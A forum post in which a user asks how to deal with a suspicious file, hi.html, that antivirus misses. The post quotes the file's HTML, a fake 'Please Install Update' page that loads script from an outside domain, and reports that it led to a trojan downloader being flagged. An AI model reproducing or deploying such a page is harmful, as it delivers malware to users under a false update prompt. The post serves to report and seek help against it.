John Hull
Hi, I seem to have a strange file resident on my system: C:\WINDOWS\hi.html
The content is:
------------------------------------
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Pop Up...</title>
<font color="#0000FF">Please Install
Update.....</head></font><body></body></html>
<!-- AUTO PROMPT START -->
<script language="javascript" type="text/javascript"
src="http://public.windupdates.com/promp...9fd95f6638&k=e331c7c7cf5988756be0eaf2fe4f185d"></script>
<script language="javascript" type="text/javascript">self.focus();</script>
<!-- AUTO PROMPT END -->
</head>
-------------------------------------
I have NOD32 v2.12.1 (virus signature database: 1.868) installed on my
system. It does not detect this file.
What has been happening is that hi.html has somehow been executed a number
of times by my system (how I do not know).
Now to investigate what this file is, I personally executed hi.html myself,
and NOD32 picked up on the following:
----------
Archive:
http://static.windupdates.com/cab/DownloadsUnlimited/ie/bridge-c6.cab
Virus:
Win32/TrojanDownloader.Small.NAS trojan
----------
Can anyone tell me what I should do? I have run a full scan on NOD32 and
nothing shows.
One interesting thing I have noticed is that when I have NOD32 AMON
antivirus monitor showing, and I start up a browser session, I can see that
AMON is checking the hi.html file. This might be because I have previously
executed the hi.html. But I fail to understand why it checks hi.html when I
try and start up a new browser session.
I have since renamed hi.html. I don't want to just simply delete it as it
might be linked to something else. I want all links removed. I want to find
out how this file was downloaded to my system in the first place.
Any help appreciated!
Peter